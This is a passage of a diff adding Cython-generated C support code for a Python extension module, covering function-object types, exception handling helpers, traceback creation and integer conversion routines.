Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +/* FormatTypeName */ +#if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__3)); + } + return name; +} +#endif + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntFromPy */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 